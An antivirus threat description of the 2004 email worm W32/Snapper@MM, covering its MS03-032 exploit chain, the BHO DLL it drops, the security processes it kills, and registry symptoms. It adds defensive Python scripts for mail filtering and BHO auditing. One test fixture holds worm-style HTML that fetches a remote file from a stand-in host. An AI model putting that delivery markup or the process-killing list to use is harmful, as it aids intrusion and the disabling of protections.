W32/Snapper@MM
- Type: Virus
- SubType: Internet Worm
- Discovery Date: 03/24/2004
- Length: 8,704 bytes (DLL)
- Minimum DAT: 4342 (03/24/2004)
- Updated DAT: 4398 (10/13/2004)
- Minimum Engine: 5.1.00
- Description Added: 03/25/2004
- Description Modified: 03/25/2004 3:18 PM (PT)
Risk Assessment
- Corporate User: Low-Profiled
- Home User: Low-Profiled
Characteristics
-- Update March 25th 2004 15:16 PST --
This threat has been deemed Low-Profiled due to media attention at the following site: http://www.eweek.com/article2/0,1759,1554603,00.asp
--
This detection is for a worm that spreads to email addresses harvested from the Windows Address Book of the victim machine.
- Like W32/Bagle.q@MM, this worm does not spread as an email attachment. Instead, an apparently blank email message is sent. The HTML-formatted body contains markup that attempts to exploit the Internet Explorer vulnerability described in Microsoft Security Bulletin MS03-032 ("Object Tag vulnerability"). If the exploit succeeds, a remote file, BANNER.HTM, is downloaded.
- BANNER.HTM contains script that downloads a further remote file (HTMLHELP.CGI) to the victim machine.
- HTMLHELP.CGI is actually an HTML Application (HTA) whose script drops a Win32 DLL (IELOAD.DLL) into %WinDir% and loads it.
Please note: at the time of writing the HTMLHELP.CGI file is not available on the remote server, so this variant of the worm is unable to propagate.
When IELOAD.DLL is loaded on the victim machine, it registers itself as a Browser Helper Object (BHO) under a randomly generated CLSID, so that Internet Explorer loads it at start-up. It terminates the following antivirus and firewall processes if they are running:
- NAVAPW32.EXE
- CCAPP.EXE
- OUTPOST.EXE
- SPIDERML.EXE
The DLL contains its own SMTP engine, which it uses to construct outgoing messages to the recipients harvested from the victim's Windows Address Book. The messages contain HTML that loads the BANNER.HTM file as described above. The email is constructed as follows:
From: (spoofed)
Subject: Re:
Message Body: (apparently blank)
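The message shape described above (subject "Re:", a body that renders blank, HTML that pulls a remote file through an object reference) is enough for a mail-gateway heuristic. The script below is an added example written for this page, not McAfee's detection logic and not the worm's own HTML: both messages are constructed samples, the example.invalid host, the object/embed/iframe attribute list and the 20-character "blank body" threshold are assumptions, and a hit should be treated as a trigger for closer inspection rather than proof of W32/Snapper@MM.

```python
"""Heuristic for Snapper-style mail: near-empty HTML body carrying a remote
object reference. Added illustration; thresholds and samples are assumptions."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the description: spoofed sender, subject "Re:",
# body with no visible text but an <object> pointing at a remote .htm file.
SAMPLE_SNAPPER_STYLE = b"""From: someone@example.invalid
To: victim@example.invalid
Subject: Re:
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><object data="http://example.invalid/banner.htm"></object></body></html>
"""

# Constructed benign reply for comparison: a "Re:" subject with real body text.
SAMPLE_BENIGN = b"""From: alice@example.invalid
To: bob@example.invalid
Subject: Re: lunch
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><p>See you at noon, the usual place near the station.</p></body></html>
"""

BLANK_BODY_MAX_CHARS = 20  # assumption: fewer visible characters than this reads as "blank"


class _ObjectScanner(HTMLParser):
    """Collect remote object/embed/iframe sources and count visible text characters."""

    def __init__(self):
        super().__init__()
        self.remote_objects = []
        self.text_chars = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("object", "embed", "iframe"):
            for name, value in attrs:
                if name in ("data", "src", "codebase") and value:
                    if urlparse(value).scheme in ("http", "https", "ftp"):
                        self.remote_objects.append(value)

    def handle_data(self, data):
        self.text_chars += len(data.strip())


def analyse_message(raw: bytes) -> dict:
    """Return the indicators found in one RFC 822 message and an overall verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    html_body = msg.get_body(preferencelist=("html",))
    result = {
        "subject_re_only": (msg["subject"] or "").strip().lower() == "re:",
        "has_html": html_body is not None,
        "visible_text_chars": 0,
        "remote_objects": [],
        "suspicious": False,
    }
    if html_body is not None:
        scanner = _ObjectScanner()
        scanner.feed(html_body.get_content())
        result["visible_text_chars"] = scanner.text_chars
        result["remote_objects"] = scanner.remote_objects
    # The described worm mail looks empty yet references a remote object.
    result["suspicious"] = (
        bool(result["remote_objects"])
        and result["visible_text_chars"] < BLANK_BODY_MAX_CHARS
    )
    return result


if __name__ == "__main__":
    for label, sample in (("snapper-style", SAMPLE_SNAPPER_STYLE), ("benign", SAMPLE_BENIGN)):
        print(label, analyse_message(sample))
```

The subject check is reported separately rather than folded into the verdict: a bare "Re:" is common in ordinary mail and on its own is not evidence, whereas a blank-looking HTML body that still reaches out for a remote object is the property the exploit delivery actually needs.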
Symptoms
Traffic to a remote server upon viewing the email message.
Existence of unexpected Registry keys indicating the BHO installation:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{random CLSID}
- HKEY_CLASSES_ROOT\CLSID\{random CLSID}\InProcServer32 (Default) = IELOAD.DLL
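Because the CLSID is random, the symptom cannot be checked by looking for one fixed key; the two locations have to be joined: enumerate the Browser Helper Objects subkeys, then resolve each CLSID's InProcServer32 default value. The script below is an added example for this page, not McAfee's removal routine. It works on a .reg export (as written by regedit or reg export) so it runs offline against the constructed sample embedded here; the CLSIDs and the vendor DLL path in the sample are made up, and the "suspicious location" rule (bare filename, or a DLL sitting directly in %WinDir%) is an assumption layered on top of the IELOAD.DLL name from this description.

```python
"""Audit Browser Helper Object registrations from a .reg export and flag the
Snapper pattern. Added illustration; sample data and location rule are assumptions."""
import re

BHO_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"

# Constructed .reg export: one BHO resolving to a bare IELOAD.DLL (the symptom
# described on this page) and one resolving to a vendor directory for contrast.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-1111-2222-3333-444444444444}]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BBBBBBBB-5555-6666-7777-888888888888}]

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-1111-2222-3333-444444444444}\InProcServer32]
@="IELOAD.DLL"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{BBBBBBBB-5555-6666-7777-888888888888}\InProcServer32]
@="C:\\Program Files\\Example Vendor\\helper.dll"
"ThreadingModel"="Apartment"
"""


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: data}} for string values; '@' is (Default)."""
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                # .reg files escape backslashes as \\ inside quoted strings
                data = data[1:-1].replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def is_suspicious_server(dll: str) -> bool:
    """Assumed rule: the IELOAD.DLL name, a bare filename, an unresolvable server,
    or a DLL dropped straight into %WinDir% (not a subdirectory such as system32)."""
    path = dll.lower().replace("/", "\\")
    if not path:
        return True
    base = path.rsplit("\\", 1)[-1]
    if base == "ieload.dll":
        return True
    if "\\" not in path:  # no directory: resolved via the loader search path
        return True
    return re.fullmatch(r"[a-z]:\\(windows|winnt)\\[^\\]+", path) is not None


def audit_bhos(reg: dict) -> list:
    """Join each BHO CLSID to its InProcServer32 default value and rate it."""
    lowered = {k.lower(): v for k, v in reg.items()}
    prefix = BHO_KEY.lower() + "\\"
    findings = []
    for key in reg:
        if not key.lower().startswith(prefix):
            continue
        clsid = key[len(prefix):]
        server = lowered.get(f"hkey_classes_root\\clsid\\{clsid.lower()}\\inprocserver32", {})
        dll = server.get("@", "")
        findings.append({"clsid": clsid, "dll": dll, "suspicious": is_suspicious_server(dll)})
    return findings


if __name__ == "__main__":
    for finding in audit_bhos(parse_reg_export(SAMPLE_REG_EXPORT)):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['clsid']} -> {finding['dll'] or '(no InProcServer32)'}")
```

On a live machine the same join is done with "reg export" of the two hives and this script, or directly with the registry API; the point is that the random CLSID is only the label, and the InProcServer32 path is what identifies the DLL.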
Method of Infection
This worm spreads by emailing a message that attempts to exploit a Microsoft Internet Explorer vulnerability (MS03-032) in order to download remote scripts that drop and run the worm on the victim machine. It does not spread via an email attachment.
Please note: at the time of writing the HTMLHELP.CGI file is not available on the remote server, so this variant of the worm is unable to propagate.
Removal
All Users:
Use the specified engine and DAT files for detection.
Modifications made to the system Registry and/or INI files for the purpose of hooking system startup will be removed when cleaning with the current engine and the specified DATs (or higher). Older engines may not be able to remove all registry keys created by this threat.
Variants
N/A
Overview
This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.